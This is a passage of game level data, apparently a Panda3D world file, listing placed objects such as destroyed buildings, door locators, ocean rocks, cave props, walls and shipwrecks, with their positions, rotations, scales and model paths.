'models/buildings/pir_m_bld_spn_jail_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1271976903.32akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271976903.32akelts0','Holiday': '','Hpr': VBase3(-119.5, 0.0, 0.0),'Objects': {'1271976903.34akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.254, -5.504, 0.984),'Scale': VBase3(1.0, 1.0, 1.0)},'1273091457.33akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.788, 21.065, 0.984),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-165.338, -270.256, 113.524),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseC_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273015161.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-138.076, -43.77, 19.845),'Pos': Point3(744.648, -260.08, 56.886),'RenderEffect': False,'Scale': VBase3(1.938, 1.938, 1.938),'VisSize': '','Visual': {'Color': (0.572, 0.677, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273016489.02akelts': {'Type': 'Pier','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {},'Pos': Point3(274.191, 371.544, 22.191),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/islands/pier_platform'}},'1273017013.14akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017013.14akelts0','Holiday': '','Hpr': VBase3(22.772, 0.0, 0.0),'Objects': {'1273091460.78akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.044, -4.421, 5.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-305.943, -139.324, 106.885),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseI_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017082.44akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017082.44akelts0','Holiday': '','Hpr': VBase3(157.852, 4.816, 0.0),'Objects': {'1273017082.47akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.424, -5.194, 1.006),'Scale': VBase3(1.0, 1.0, 1.0)},'1273017082.48akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.661, 20.924, 1.096),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-316.742, -273.437, 120.268),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseB_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017199.25akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273017199.25akelts0','Holiday': '','Hpr': VBase3(54.527, 0.0, 0.0),'Objects': {'1273091459.09akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.161, -4.423, 16.535),'Scale': VBase3(1.0, 1.0, 1.0)},'1273619290.28akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-825.368, 156.938, 43.081),'Holiday': '','Hpr': VBase3(-178.343, 0.0, 0.0),'Pos': Point3(13.657, 12.72, 3.455),'Scale': VBase3(1.518, 1.518, 1.358),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}}},'Pos': Point3(-822.934, 138.434, 42.071),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/shanty_npc_house_combo_E','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273017453.02akelts': {'Type': 'Bridge','DisableCollision': False,'Holiday': '','Hpr': VBase3(-84.899, 14.033, -0.018),'Objects': {'1273017340.64akelts': {'Type': 'Bridge','DisableCollision': False,'GridPos': Point3(-735.901, 143.663, 48.606),'Holiday': '','Hpr': VBase3(0.0, -15.794, 0.0),'Pos': Point3(0.0, -44.23, 0.148),'Scale': VBase3(1.0, 1.014, 0.986),'VisSize': '','Visual': {'Model': 'models/props/shanty_rope_bridge'}}},'Pos': Point3(-681.829, 148.489, 56.807),'Scale': VBase3(0.523, 1.273, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shanty_rope_bridge'}},'1273072887.39akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.982, 0.0, 0.0),'Objects': {'1273072952.05akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(261.489, 592.315, 43.38),'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(5.448, -6.714, 18.47),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_wheel'}}},'Pos': Point3(232.086, 584.296, 24.91),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_conveyor_tower'}},'1273072923.48akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(27.307, -3.78, 1.949),'Pos': Point3(249.812, 584.9, 25.276),'Scale': VBase3(0.657, 0.657, 0.657),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_supportBeam_pile'}},'1273073067.58akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073067.58akelts0','Holiday': '','Hpr': VBase3(-170.301, 5.411, 4.047),'Objects': {'1273091461.7akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.162, -4.354, 0.599),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-296.862, 389.079, 49.049),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseG_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273073190.25akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073190.25akelts0','Holiday': '','Hpr': VBase3(123.404, 0.0, 0.0),'Objects': {'1273073190.27akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-437.274, 15.618, 73.009),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-8.035, -1.826, 0.068),'Scale': VBase3(1.0, 1.0, 1.0)},'1273073190.28akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','GridPos': Point3(-420.817, 15.574, 73.097),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(8.421, -1.87, 0.156),'Scale': VBase3(1.0, 1.0, 1.0)},'1273073249.37akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273073249.37akelts0','GridPos': Point3(-464.632, 41.816, 71.332),'Holiday': '','Hpr': VBase3(-1.105, 0.0, -3.426),'Pos': Point3(17.765, -1.023, -1.021),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/spanish_npc_attach_halfporchR','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}}},'Pos': Point3(-455.706, 26.422, 72.353),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_spn_houseA_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273074334.16akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(44.362, 0.872, -0.174),'Pos': Point3(-403.417, 12.617, 72.626),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273074421.59akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273074421.59akelts0','GridPos': Point3(-468.132, 20.639, 71.921),'Holiday': '','Hpr': VBase3(-57.52, 0.0, 0.0),'Pos': Point3(-456.576, 4.309, 72.405),'Scale': VBase3(1.0, 1.0, 0.898),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/spanish_npc_attach_fullarchR','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273091585.2akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(108.943, 1190.323, 4.009),'Scale': VBase3(4.28, 4.28, 4.28),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091830.78akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-51.561, 0.0, 0.0),'Pos': Point3(887.329, 788.136, 4.008),'Scale': VBase3(3.476, 3.476, 1.791),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091831.92akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-658.41, 619.207, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091832.89akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.977, 0.0, 0.0),'Pos': Point3(456.202, 835.02, 4.009),'Scale': VBase3(2.811, 2.811, 2.811),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091845.5akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-657.826, 450.861, 4.009),'Scale': VBase3(3.987, 3.987, 3.987),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091851.12akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-65.801, 0.0, 0.0),'Pos': Point3(885.27, -126.372, 4.009),'Scale': VBase3(2.199, 2.199, 2.199),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273091865.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.794, 0.0, 0.0),'Pos': Point3(-596.681, 800.442, 4.005),'Scale': VBase3(3.494, 3.494, 3.494),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273091868.48akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-843.534, 649.14, 4.009),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091870.05akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-994.83, 357.834, 4.009),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_e'}},'1273091872.62akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(612.132, 792.482, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091875.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(73.975, 0.0, 0.0),'Pos': Point3(-901.321, 283.482, 4.007),'Scale': VBase3(2.269, 2.269, 2.269),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091877.31akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-103.803, 0.0, 0.0),'Pos': Point3(-469.619, 690.662, 4.01),'Scale': VBase3(2.459, 2.459, 2.459),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091882.56akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(13.514, 0.0, 0.0),'Pos': Point3(-739.855, 82.339, 4.01),'Scale': VBase3(4.24, 4.24, 4.24),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091884.67akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(70.466, 0.0, 0.0),'Pos': Point3(-512.176, 452.931, 4.01),'Scale': VBase3(2.723, 2.723, 2.723),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091886.73akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(846.065, 109.503, 4.01),'Scale': VBase3(2.86, 2.86, 2.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091888.0akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-520.118, 878.285, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091891.72akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-1036.701, 167.916, 4.017),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091893.66akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(83.594, 1012.43, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091899.75akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(84.048, 0.0, 0.0),'Pos': Point3(-932.266, -2.44, 4.009),'Scale': VBase3(3.274, 3.274, 3.274),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091901.5akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(121.925, 0.0, 0.0),'Pos': Point3(-841.015, 496.424, 4.009),'Scale': VBase3(2.507, 2.507, 2.507),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091902.91akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-115.794, 0.0, 0.0),'Pos': Point3(373.114, 1160.444, 4.007),'Scale': VBase3(2.861, 2.861, 2.861),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091904.2akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-95.606, 0.0, 0.0),'Pos': Point3(948.735, -386.822, 4.009),'Scale': VBase3(3.135, 3.135, 3.135),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091905.59akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-13.286, 0.0, 0.0),'Pos': Point3(-433.509, 1000.046, 4.011),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273092494.95akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-152.462, 0.0, 0.0),'Pos': Point3(-604.718, 933.696, 4.009),'Scale': VBase3(3.135, 3.135, 3.135),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273092504.59akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-149.088, 0.0, 0.0),'Pos': Point3(737.206, 1157.633, 4.009),'Scale': VBase3(2.866, 2.866, 2.866),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273092521.83akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-215.098, 1063.035, 4.01),'Scale': VBase3(2.86, 2.86, 2.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273092820.69akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(224.595, 899.125, 4.01),'Scale': VBase3(1.834, 1.834, 1.834),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273092917.44akelts': {'Type': 'Ship Wreck','Hpr': VBase3(-172.694, 18.329, 28.587),'Pos': Point3(-828.784, -208.333, -3.961),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_sloop_fore'}},'1273093125.0akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-121.391, 0.0, 0.0),'Pos': Point3(-182.392, 879.539, 4.005),'Scale': VBase3(3.494, 3.494, 3.494),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273093994.66akelts': {'Type': 'Ship Wreck','Hpr': VBase3(116.551, 17.282, -3.541),'Pos': Point3(-611.8, 759.119, 33.568),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_sloop_fore'}},'1273095685.5akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-146.705, -0.889, 0.004),'Pos': Point3(-469.951, 80.64, 68.103),'Scale': VBase3(1.363, 0.541, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273096169.53akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-493.175, 64.579, 72.836),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096197.31akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(302.235, 359.987, 0.889),'Pos': Point3(-442.326, -16.057, 72.125),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096243.31akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(36.399, 0.888, -0.052),'Pos': Point3(-442.329, -16.052, 71.718),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273096339.62akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(36.399, 0.888, -0.052),'Pos': Point3(-426.234, -4.186, 71.736),'Scale': VBase3(1.423, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Cracked20'}},'1273096383.28akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(84.151, 0.559, -0.692),'Pos': Point3(-402.529, 12.562, 70.327),'Scale': VBase3(1.423, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall20_burned'}},'1273096397.64akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(96.876, 0.393, -0.798),'Pos': Point3(-399.917, 40.149, 70.554),'Scale': VBase3(1.423, 1.0, 1.127),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096448.37akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-55.894, 0.016, 0.889),'Pos': Point3(-432.786, 89.182, 67.272),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6, 0.65, 0.7, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn_burned'}},'1273096512.7akelts': {'Type': 'Arch','Hpr': VBase3(123.416, 0.0, 0.0),'Pos': Point3(-408.546, 53.364, 72.666),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.8999999761581421, 0.8999999761581421, 0.8999999761581421, 1.0),'Model': 'models/buildings/spanish_archB'}},'1273096619.89akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-451.142, -1.304, 72.505),'Scale': VBase3(1.6, 0.69, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Broken10'}},'1273096651.64akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-55.894, 0.016, 0.889),'Pos': Point3(-417.56, 66.204, 69.944),'Scale': VBase3(1.264, 1.014, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096725.8akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-492.683, 63.8, 72.821),'Scale': VBase3(1.264, 0.41, 0.87),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/buildings/TallWallStucco_Cracked20'}},'1273096809.36akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(124.258, -0.018, -0.889),'Pos': Point3(-418.056, 67.039, 68.062),'Scale': VBase3(1.264, 0.677, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall20_burned'}},'1273096858.19akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(153.718, -0.453, -0.765),'Pos': Point3(-433.707, 89.848, 68.491),'Scale': VBase3(1.264, 0.677, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall10_burned'}},'1273096915.0akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-2.409, 0.724, 0.516),'Pos': Point3(-446.137, 95.9, 68.675),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn_burned'}},'1273096950.17akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-146.705, -0.889, 0.004),'Pos': Point3(-447.168, 95.603, 68.105),'Scale': VBase3(1.363, 0.541, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273097195.03akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(124.27, 0.0, 0.0),'Pos': Point3(-234.108, -316.147, 101.182),'RenderEffect': False,'Scale': VBase3(1.942, 1.942, 1.942),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273097229.58akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(5.731, -18.784, -93.689),'Pos': Point3(-165.524, 42.236, 194.414),'RenderEffect': False,'Scale': VBase3(1.69, 1.69, 1.69),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097295.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-130.883, -26.026, 0.0),'Pos': Point3(693.728, -218.907, 154.885),'RenderEffect': False,'Scale': VBase3(1.468, 1.468, 1.468),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273097340.39akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-151.648, 0.0, 0.0),'Pos': Point3(-161.634, -134.04, 101.992),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.484, 0.545, 0.637, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273097382.52akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-83.949, -3.312, 0.333),'Pos': Point3(-84.234, 586.083, 26.414),'RenderEffect': False,'Scale': VBase3(2.196, 2.196, 2.196),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273097482.17akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(132.521, 3.357, 13.41),'Pos': Point3(-331.969, 465.304, -2.236),'RenderEffect': False,'Scale': VBase3(2.167, 2.167, 2.167),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273097538.3akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-144.29, 1.428, -5.465),'Pos': Point3(-530.097, 94.256, 71.854),'RenderEffect': False,'Scale': VBase3(4.47, 4.47, 4.47),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273097599.77akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-61.516, 0.0, 0.0),'Pos': Point3(-382.52, 0.496, 63.488),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097723.86akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(148.395, -8.891, 0.0),'Pos': Point3(-585.031, 369.323, -6.635),'RenderEffect': False,'Scale': VBase3(1.513, 1.513, 1.513),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097816.3akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-94.459, 0.0, -0.569),'Pos': Point3(-608.14, 172.708, 65.088),'RenderEffect': False,'Scale': VBase3(2.699, 2.699, 2.699),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1273097904.06akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.874, -2.73, 0.0),'Pos': Point3(-599.051, 52.412, 55.301),'RenderEffect': False,'Scale': VBase3(1.976, 1.976, 1.976),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273098024.53akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(73.37, 0.0, 0.0),'Pos': Point3(-85.086, -261.118, 101.18),'RenderEffect': False,'Scale': VBase3(1.69, 1.69, 1.69),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098331.05akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-9.77, 0.0, 0.0),'Pos': Point3(468.476, -97.47, -1.737),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273098381.94akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(82.271, 0.0, 0.0),'Pos': Point3(307.113, 458.935, 217.203),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 